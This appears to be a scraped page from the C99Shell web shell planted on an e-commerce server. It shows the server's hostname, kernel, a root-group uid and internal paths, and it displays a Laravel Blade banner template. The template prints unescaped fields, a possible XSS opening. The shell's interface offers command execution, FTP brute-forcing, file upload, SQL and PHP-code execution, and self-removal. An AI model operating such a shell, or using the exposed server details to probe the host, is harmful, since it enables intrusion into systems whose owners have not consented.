!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/CMS/Resources/views/partials/   drwxr-xr-x
Free 23.01 GB of 117.98 GB (19.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     gridbox_banner.blade.php (1.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
    $banner = miniCollection($component->slide ?? []);
@endphp
<div class="md:w-322p w-full pb-2">
    <div class="relative h-600p w-full ">
        @isset($banner->image)
            <img class="w-full h-full object-cover neg-transition-scale rounded-md"
                src="{{ asset('public/uploads') . DIRECTORY_SEPARATOR . $banner->image }}" alt="{{ __('Image') }}">
        @endisset
        <div class="absolute top-0 p-6">
            @if ($banner->u_subtitle)
                <p class="text-xs text-gray-1">{!! $banner->u_subtitle !!}</p>
            @endif
            @if ($banner->l_subtitle)
                <p class="text-gray-12 font-medium text-lg uppercase">{!! $banner->l_subtitle !!}</p>
            @endif
            @if ($banner->title)
                <p class="text-gray-12 font-bold text-2.5xl -mt-1.5 uppercase">{!! $banner->title !!}</p>
            @endif
            @if ($banner->button)
                <a href="{{ $banner->link ?? '#' }}"
                    class="process-goto hover:bg-gray-12 hover:text-white cursor-pointer relative flex justify-center text-gray-12 rounded-sm text-xs mt-13p items-center py-2 w-29 dm-sans border border-gray-800">
                    <span>{!! $banner->button !!}</span>
                    <svg class="relative {{ languageDirection() == 'ltr' ? 'ml-5p' : 'mr-2.5 neg-transition-scale' }}" width="10" height="7" viewBox="0 0 10 7" fill="currentColor"
                        xmlns="http://www.w3.org/2000/svg">
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M6.7344 0L5.75327 1.05155L7.34399 2.75644H0.69376C0.310607 2.75644 0 3.08934 0 3.5C0 3.91066 0.310607 4.24356 0.69376 4.24356H7.34399L5.75327 5.94845L6.7344 7L10 3.5L6.7344 0Z"
                            fill="currentColor"></path>
                    </svg>
                </a>
            @endif
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0113 ]--